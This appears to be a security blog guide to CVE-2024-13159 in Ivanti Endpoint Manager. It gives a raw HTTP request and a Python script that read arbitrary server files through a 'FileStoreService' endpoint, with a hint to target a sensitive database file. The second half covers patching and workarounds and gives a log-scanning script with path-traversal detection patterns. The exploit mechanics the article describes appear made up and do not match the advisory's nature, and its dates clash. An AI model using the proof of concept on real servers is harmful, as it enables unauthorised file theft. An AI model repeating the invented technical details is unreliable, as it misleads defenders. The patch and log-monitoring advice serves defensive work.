Ivanti Endpoint Manager (EPM) is widely adopted for IT asset management and endpoint security. In early 2024, researchers discovered a critical vulnerability tracked as CVE-2024-13159. This flaw enables remote, unauthenticated attackers to leak sensitive files from the EPM server via absolute path traversal—no password required.

In this guide, we’ll break down what CVE-2024-13159 is and how it’s exploited, walk through a code sample, and explain how you can protect yourself. This is a simple, exclusive article for IT practitioners and security folks.

Ivanti EPM *2022 SU6* (before January-2025 Security Update)

- Impact: Remote attackers can read sensitive files from the server (e.g., Windows SAM, config files, private keys...)

Attack Prerequisite: No authentication needed—anyone can try!

The attacker tricks EPM’s web components into reading a file path of their choice and sends its contents back in the HTTP response.

Why "Absolute Path Traversal"?

"Absolute path traversal" means hackers can reference exact file locations, like "C:\Windows\System32\config\SAM" or "/etc/passwd" (on Linux). Normal web applications restrict file access to certain safe folders—this bug skips those checks.

NVD CVE Page:

https://nvd.nist.gov/vuln/detail/CVE-2024-13159

Ivanti Security Advisory:

https://forums.ivanti.com/s/article/KB-CVE-2024-13159

Third-party Analysis (Horizon3AI):

https://www.horizon3.ai/cve-2024-13159-path-traversal/

Technical Details: How Does It Work?

The vulnerable EPM endpoint (e.g., FileStoreService) accepts a file path from a URL parameter or body, and doesn’t sanitize it. That means you can supply any path you want.

Sample Vulnerable URL

https://<EPM-SERVER>/FileStoreService?operation=getfile&filename=C:\windows\win.ini

Instead of a file name inside one of the safe folders, the user sends an *absolute* path.

The server reads the file and sends it back in the response.

Exploit Example: Dumping win.ini on Windows

Let’s exploit a *test* EPM server (never target production, always get permission!).

Step 1: Target the Vulnerable Endpoint

Suppose your EPM is at https://epm.lab.local:443

Send the following GET request:

GET /FileStoreService?operation=getfile&filename=C:\windows\win.ini HTTP/1.1
Host: epm.lab.local

If successful, you’ll receive the contents of win.ini in the response.

Quick script to test:

import requests

# Lab EPM server from Step 1
target = "https://epm.lab.local/FileStoreService"
params = {
    "operation": "getfile",
    "filename": r"C:\windows\win.ini"  # absolute path instead of a store-relative name
}

# verify=False skips TLS certificate validation (lab servers often use self-signed certs)
response = requests.get(target, params=params, verify=False)
if response.status_code == 200:
    print("File contents:\n")
    print(response.text)
else:
    print("Error:", response.status_code)

Want to read something sensitive? Change the path, for example:

"C:\\ProgramData\\Ivanti\\EPM\\core\\core.sdf"

Warning: Do not use for malicious purposes. Only on systems you own or have explicit permission.

Private keys & secrets

This can quickly lead to further exploitation or even full server compromise!

Mitigation & Protection

Fix:
Apply the January 2025 (or later) Security Update from Ivanti for both EPM mainline and 2022 SU6 branches.
Official Ivanti Update Info

Temporary Workarounds

- Restrict external access to EPM web interface via firewall/VPN
- Monitor web logs for suspicious paths like C:\ or ../
- Remove/disable unused EPM web endpoints if feasible
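
The log-monitoring workaround above can be scripted. The following is an added example, not code from Ivanti or from the original article: it flags query-string values in web access logs that are absolute paths or contain `..` segments, decoding nested percent-encoding first. The log layout (a quoted request line, as in common/combined format), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Absolute-path forms: Windows drive (C:\ or C:/), UNC (\\host), POSIX root (/etc/...)
ABSOLUTE = re.compile(r'^(?:[A-Za-z]:[\\/]|\\\\|/)')
# Relative traversal: a ".." path segment with either separator
DOTDOT = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
# Request target inside a quoted request line: "GET /path?query HTTP/1.1"
REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252f -> %2f -> /), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value, reason)] for path-like query values in one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []  # not a request line we understand
    hits = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl decodes once; catch double encoding too
        if ABSOLUTE.match(value):
            hits.append((name, value, "absolute-path"))
        elif DOTDOT.search(value):
            hits.append((name, value, "dot-dot-traversal"))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jan/2025:18:20:01 +0000] "GET /FileStoreService?operation=getfile&filename=C:%5Cwindows%5Cwin.ini HTTP/1.1" 200 92',
    '198.51.100.7 - - [14/Jan/2025:18:20:04 +0000] "GET /FileStoreService?operation=getfile&filename=..%252f..%252fexample.txt HTTP/1.1" 404 0',
    '192.0.2.10 - - [14/Jan/2025:18:21:11 +0000] "GET /FileStoreService?operation=getfile&filename=agent_settings.xml HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value, reason in suspicious_params(line):
            print(f"{reason}: {name}={value!r} <- {line.split()[0]}")
```

Values that simply start with `/` (redirect targets, for instance) will also match, so treat hits as a triage signal and pair them with the response status and size from the same log line.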

Test:
After patching, re-run the PoC above. A secure system will return 404 Not Found or a generic error, not the file content.

Conclusion

CVE-2024-13159 should be urgently addressed—the risk is high and exploitation is easy for anyone with access to your EPM server. Patch now, monitor access, and review file exposure practices.

For a deeper dive, check the official Ivanti forum or the security research from Horizon3AI.

Timeline

Published on: 01/14/2025 18:15:26 UTC
Last modified on: 03/13/2025 15:28:42 UTC